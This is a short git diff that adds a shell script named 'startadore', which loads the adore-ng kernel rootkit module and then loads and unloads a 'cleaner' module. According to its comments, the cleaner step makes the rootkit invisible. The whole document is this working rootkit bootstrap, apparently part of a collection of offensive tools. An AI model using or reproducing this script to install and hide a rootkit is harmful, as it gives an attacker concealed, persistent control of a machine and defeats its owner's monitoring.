diff options
Diffstat (limited to 'other/adore-ng/startadore')
| -rwxr-xr-x | other/adore-ng/startadore | 11 |
1 files changed, 11 insertions, 0 deletions
diff --git a/other/adore-ng/startadore b/other/adore-ng/startadore new file mode 100755 index 0000000..a30751e --- /dev/null +++ b/other/adore-ng/startadore | |||
| @@ -0,0 +1,11 @@ | |||
| 1 | #!/bin/sh | ||
| 2 | |||
| 3 | # Use this script to bootstrap adore! | ||
| 4 | # It will make adore invisible. You could also | ||
| 5 | # insmod adore without $0 but then its visible. | ||
| 6 | |||
| 7 | insmod ./adore-ng.o | ||
| 8 | insmod ./cleaner.o | ||
| 9 | rmmod cleaner | ||
| 10 | |||
| 11 | |||
